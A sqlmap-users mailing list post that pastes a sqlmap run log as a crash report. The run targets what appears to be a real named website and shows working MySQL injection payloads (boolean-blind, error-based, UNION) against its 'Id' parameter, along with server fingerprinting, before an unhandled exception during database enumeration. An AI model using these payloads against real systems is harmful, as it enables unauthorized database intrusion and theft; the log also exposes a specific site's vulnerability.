sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Authors assume no liability and
are not responsible for any misuse or damage caused by this program
[*] starting at 16:27:50
[16:27:50] [INFO] using 'C:\Users\Admin\Desktop\sqlmap\output\
www.dtvthai.com\session' as session file
[16:27:50] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:27:50] [INFO] testing connection to the target url
[16:27:54] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=3) AND 4216=4216 AND (6256=6256
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: Id=3) AND (SELECT 2258 FROM(SELECT
COUNT(*),CONCAT(0x3a656c643a,(SELECT (CASE WHEN (2258=2258) THEN 1 ELSE 0
END)),0x3a6a6a643a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3553=3553
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: Id=3) LIMIT 1,1 UNION ALL SELECT NULL,
CONCAT(0x3a656c643a,0x5877664a584155517a56,0x3a6a6a643a), NULL, NULL, NULL#
---
[16:27:54] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD or Linux FreeBSD 7.3
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[16:27:54] [INFO] fetching database names
[16:27:54] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run
with the latest development version from the Subversion repository. If the
exception persists, please send by e-mail to
sqlmap-users@lists.sourceforge.net the following text and any information
required to reproduce the bug. The developers will try to reproduce the
bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.2
Operating system: nt
Command line: C:\Users\Admin\Desktop\sqlmap\sqlmap.py -u
******************************* --dbs
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
[*] shutting down at 16:27:54
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
